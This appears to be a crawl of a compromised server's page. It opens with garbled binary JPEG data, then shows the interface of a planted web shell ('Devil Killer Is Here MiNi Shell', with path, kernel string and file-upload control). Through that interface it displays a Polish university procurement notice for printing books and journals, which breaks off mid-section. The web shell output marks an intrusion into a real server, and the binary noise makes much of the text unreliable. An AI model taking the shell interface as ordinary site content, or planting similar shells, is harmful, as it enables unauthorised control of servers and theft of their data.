JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0004041801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> [D/63/2021] Sukcesywny druk i dostawa książek i czasopism na potrzeby Uniwersytetu Opolskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET OPOLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001382</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Mikołaja Kopernika 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@uni.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zamowienia.uni.opole.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> [D/63/2021] Sukcesywny druk i dostawa książek i czasopism na potrzeby Uniwersytetu Opolskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4aa108bc-78f9-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00040418</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002822/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.11 Druk i dostawa (książki, druki akcydensowe,dzienniki laboratoryjne, dyplomy, świadectwa)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/563509 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/563509</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej określono w Rozdziale I pkt.<br/>12 SWZ.<br/>Na podstawie art. 65 ust 1 pkt 4 Pzp Zamawiający odstępuje od użycia środków komunikacji<br/>elektronicznej w zakresie złożenia próbek do oceny kryterium jakości technicznej w części nr 1 oraz 2.<br/>Ponadto Zamawiajacy informuje, że adresem strony internetowej prowadzonego postępowania, na<br/>której udostępniano SWZ oraz na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne<br/>dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia oraz za<br/>pośrednictwem której odbywa się komunikacja pomiędzy Wykonawcą<br/>a Zamawiającym jest: https://platformazakupowa.pl/transakcja/563509, zwana dalej platformą<br/>zakupową.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1. Przedmiotowy środek dowodowy, o którym mowa w pkt 8.1.1 SWZ (dot. części nr 1) oraz pkt 8.1.3 SWZ (dot. części nr 2) należy w interesie Wykonawcy złożyć w zamkniętym, nieprzezroczystym opakowaniu, uniemożliwiającym odczytanie jego zawartości, zabezpieczonym przed uszkodzeniem zawartości, oznaczonym nazwą i adresem Zamawiającego oraz opisanym zgodnie z pkt 16.20 SWZ<br/>2. Wszystkie elementy (próbki) muszą być złożone wewnątrz opakowania z czytelnym wskazaniem<br/>Wykonawcy od którego pochodzą oraz części postępowania której dotyczą.<br/>3. Wykonawca może wprowadzić zmiany, poprawki, modyfikacje i uzupełnienia do złożonych próbek. Zamawiający otrzyma powiadomienie o wprowadzeniu zmian, poprawek itp. przed terminem składania ofert.<br/>4. Powiadomienie o wprowadzeniu zmian, o którym mowa w pkt. 3 musi być złożone według takich<br/>samych zasad jak składane próbki oraz odpowiednio oznakowane, z dopiskiem „ZMIANA”.<br/>5. Opakowania oznakowane dopiskiem „ZMIANA” zostaną otwarte bezpośrednio przed otwarciem<br/>pierwotnej oferty Wykonawcy, który wprowadził zmiany i po stwierdzeniu poprawności procedury<br/>dokonania zmian, i zostaną dołączone do oferty.<br/>6. W przypadku wycofania oferty Wykonawcy z postępowania, o czym mowa w punkcie 16.11 SWZ,<br/>próbki dołączone do wycofanej oferty zostaną przez Zamawiającego bez otwierania zwrócone temu<br/>Wykonawcy po terminie otwarcia ofert.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str. 1),dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem Państwa danych osobowych jest Uniwersytet Opolski, Pl. Kopernika 11A, 45-040 Opole.<br/>2. Inspektorem ochrony danych osobowych w Uniwersytecie Opolskim jest Pan Jacek Najgebauer, tel. 77 452 7099, email:iod@uni.opole.pl<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO – co oznacza, że przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr D/63/2021 prowadzonym w trybie wskazanym w pkt. 2.1 SWZ.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18-19 ustawy.<br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy.<br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany.<br/>8. Posiadają Państwo:<br/>− na podstawie art. 15 RODO prawo dostępu dodanych osobowych Państwa dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Państwu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych,o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych j est art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach, o których mowa w art. 19<br/>ust.2 i 3 ustawy. Zgodnie z art. 19 ust. 4ustawy Zamawiający informuje o ograniczeniach, o których<br/>mowa w art. 19 ust. 2 i 3 ustawy:<br/>−Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO,nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>− Na mocy art. 19ust. 3 ustawy wystąpienie z żądaniem ograniczenia przetwarzania danych<br/>osobowych, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/63/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część nr 1: Druk i sukcesywna dostawa książek wraz z materiałem ilustracyjnym, czasopism i<br/>informatorów dla Wydawnictwa Uniwersytetu Opolskiego<br/>2. Opis przedmiotu zamówienia został ujęty w załączniku nr 1A-1 oraz 1A-2 (folder plików) do SWZ<br/>3. Ilości (nakład) wskazane w załącznikach do SWZ są wielkościami orientacyjnymi ustalonymi<br/>na podstawie zużycia przez okres ostatnich dwunastu [ 12 ] miesięcy oraz przewidywanego<br/>zapotrzebowania Zamawiającego. Zamawiający ma możliwość zmiany ilości zamawianego<br/>przedmiotu zamówienia w poszczególnych pozycjach podanych w załączniku 1A<br/>4. Dostawa przedmiotu zamówienia w rozumieniu SWZ jest działaniem Wykonawcy<br/>polegającym na sukcesywnym dostarczaniu Zamawiającemu przedmiotu zamówienia, o<br/>wymaganiach/parametrach nie gorszych niż te określone w opisie przedmiotu zamówienia i<br/>ofercie wykonawcy, w odpowiedzi na jednostkowe, bieżące Zamówienia Zamawiającego<br/>składane Wykonawcy w okresie, o którym mowa w pkt. 5<br/>5. Termin wykonania przedmiotu zamówienia: sukcesywnie w ciągu dwunastu [ 12 ] miesięcy od<br/>dnia zawarcia umowy lub do wyczerpania limitu kwoty określonej w ofercie Wykonawcy, którego<br/>oferta zostanie wybrana jako najkorzystniejsza.<br/>6. Umowa zawarta w wyniku przedmiotowego postępowania wygaśnie mimo niewykorzystania<br/>środków przeznaczonych na realizację przedmiotu zamówienia (wartości na jaką zostanie<br/>zawarta umowa) po upływie terminu obowiązywania umowy (wskazanego w pkt.5) lub w<br/>momencie wykorzystania środków przeznaczonych na realizację przedmiotu zamówienia<br/>(wartości na jaką zostanie zawarta umowa) mimo nieupłynięcia terminu, o którym mowa w pkt. 5.<br/>7. Dostawa przedmiotu zamówienia tj.: każdego pojedynczego Zamówienia, następować będzie<br/>w ciągu:<br/>7.1. maksymalnie jedenastu [ 11 ] oraz minimalnie pięciu [ 5 ] dni roboczych dla książek z<br/>okładką miękką<br/>7.2. maksymalnie trzynastu [ 13 ] oraz minimalnie ośmiu [ 8 ] dni roboczych dla książek z<br/>okładką twardą. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">22000000-0 - Druki i produkty podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22100000-1 - Drukowane książki, broszury i ulotki</p> <p class="mb-0">22110000-4 - Drukowane książki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktacja badanej oferty = Liczba punktów w kryterium &#34;Cena&#34; + Liczba<br/>punktów w kryterium &#34;Ocena jakości technicznej książek&#34; + Liczba punktów w kryterium &#34;Termin<br/>dostarczenia przedmiotu zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena jakości technicznej książek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostarczenia przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Część nr 2: Druk i sukcesywna dostawa czasopisma „Indeks” wraz z materiałem ilustracyjnym<br/>dla Biura Marketingu i Public Relations<br/>2. Opis przedmiotu zamówienia został ujęty w załączniku nr 1Bdo SWZ<br/>3. Ilości (nakład) wskazane w załącznikach do SWZ są wielkościami orientacyjnymi ustalonymi<br/>na podstawie zużycia przez okres ostatnich dwunastu [ 12 ] miesięcy oraz przewidywanego<br/>zapotrzebowania Zamawiającego. Zamawiający ma możliwość zmiany ilości zamawianego<br/>przedmiotu zamówienia w poszczególnych pozycjach podanych w załączniku 1B<br/>4. Dostawa przedmiotu zamówienia w rozumieniu SWZ jest działaniem Wykonawcy<br/>polegającym na sukcesywnym dostarczeniu Zamawiającemu przedmiotu zamówienia, o<br/>wymaganiach/parametrach nie gorszych niż te określone w opisie przedmiotu zamówienia i<br/>ofercie wykonawcy, w odpowiedzi na jednostkowe, bieżące Zamówienia Zamawiającego<br/>składane Wykonawcy w okresie, o którym mowa w pkt. 5<br/>5. Termin wykonania przedmiotu zamówienia: sukcesywnie w ciągu dwunastu [ 12 ] miesięcy od<br/>dnia zawarcia umowy lub do wyczerpania limitu kwoty określonej w ofercie Wykonawcy, którego<br/>oferta zostanie wybrana jako najkorzystniejsza.<br/>6. Umowa zawarta w wyniku przedmiotowego postępowania wygaśnie mimo niewykorzystania<br/>środków przeznaczonych na realizację przedmiotu zamówienia (wartości na jaką zostanie<br/>zawarta umowa) po upływie terminu obowiązywania umowy (wskazanego w pkt.5) lub w<br/>momencie wykorzystania środków przeznaczonych na realizację przedmiotu zamówienia<br/>(wartości na jaką zostanie zawarta umowa) mimo nieupłynięcia terminu, o którym mowa w pkt. 5.<br/>7. Dostawa przedmiotu zamówienia tj.: każdego pojedynczego Zamówienia, następować będzie<br/>w ciągu maksymalnie czterech [ 4 ] oraz minimalnie dwóch [ 2 ] dni roboczych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">22000000-0 - Druki i produkty podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22212000-9 - Czasopisma</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktacja badanej oferty = Liczba punktów w kryterium &#34;Cena&#34; + Liczba<br/>punktów w kryterium &#34;Ocena jakości technicznej publikacji&#34; + Liczba punktów w kryterium &#34;Termin<br/>dostarczenia przedmiotu zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena jakości technicznej publikacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostarczenia przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunek dla części nr 1:*<br/>Warunek dotyczący zdolności technicznej lub zawodowej będzie uznany za spełniony jeżeli:<br/>Wykonawca w okresie ostatnich trzech [ 3 ] lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał minimum dwie [<br/>2 ] dostawy odpowiadające swoim rodzajem dostawie stanowiącej przedmiot niniejszego<br/>zamówienia, na wartość minimum sto tysięcy 00/100 [ 100 000,00 ] złotych brutto<br/>każda.<br/>2. Warunek dla części nr 2:*<br/>Warunek dotyczący zdolności technicznej lub zawodowej będzie uznany za spełniony jeżeli:<br/>Wykonawca w okresie ostatnich trzech [ 3 ] lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał minimum dwie [<br/>2 ] dostawy tożsame z przedmiotem niniejszego zamówienia, na wartość minimum pięćdziesiąt<br/>tysięcy [ 50 000,00 ] złotych brutto każda.<br/>*Warunek udziału w postępowaniu określony (odpowiednio do części), zostanie uznany za spełniony jeżeli Wykonawca lub podmiot udostępniający zasoby temu Wykonawcy lub jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; spełni w całości warunek udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 